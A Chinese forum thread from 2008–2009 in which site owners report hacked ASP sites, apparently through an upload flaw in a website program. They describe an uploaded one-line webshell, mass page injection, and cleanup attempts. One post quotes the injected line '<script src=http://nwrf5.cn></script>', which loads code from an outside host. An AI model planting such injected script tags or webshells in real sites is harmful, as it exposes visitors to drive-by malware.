程序安全反馈

gwyzy9056 · 发表于 2008-12-19 13:50:06

allowuploadfile 表中的 expfilename 字段被写入 asp , 字段id被写入 5

Upfiles 目录中的 person 目录中多了一.asp的文件,文件前缀为随机产生的值,下载后打开发现是一句话木马
内容为 execute("#")

反应症状为所有目录下有index 开头的文件通通被写入了js

inc 文件夹下大部分文件被批量挂马

后台部分文件被挂马

我又修改了数据库名和后台路径并换了空间,还会出现被黑的现像,请贵公司检查程序漏洞，谢谢

baimaliu2008 · 发表于 2008-12-20 23:23:34

一样的情况哦，等解决方案~

baimaliu2008 · 发表于 2008-12-20 23:30:58

官方网站也被挂马了哦。
http://demo.finereason.com/

最底下有这段代码 <script src=http://nwrf5.cn></script>，所以JS文件、index.asp、head.asp 都挂上了这段代码

dillong · 发表于 2009-1-7 09:27:46

你说的就是我网站中的。一样一样的。。。我把allowuploadfile表里的一些多余类型文件全删了

dillong · 发表于 2009-1-7 09:57:37

我现在修改完了。把数据库里的表里.asp类型文件全干掉了，改后修改后台路径，把upload文件里的.asp文件清除，把所有木马代码干掉nwrf5.cn这个

dillong · 发表于 2009-1-8 11:06:08

官方对免费用户的问题不太重视啊。。。两天都没人回个信儿

jcshen2000 · 发表于 2009-1-8 13:28:20

我的网站也是这样的情况www.qianbo.net,不知道什么时候才能好啊````

dillong · 发表于 2009-1-9 12:14:26

我是昨天处理的网站程序，今天又被挂马了。。气人。。
官方为啥不早点放出补丁呢，至少现在我都不知道这个网站是怎么被黑的，通过哪个漏洞上传的

dillong · 发表于 2009-1-14 10:46:41

就是没人管啊。。。官方的公司要黄了吧？？？
论坛上垃圾信息都没有人删了。。。。

dillong · 发表于 2009-1-15 08:21:56

没有解决。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

账号		自动登录	找回密码
密码			注册会员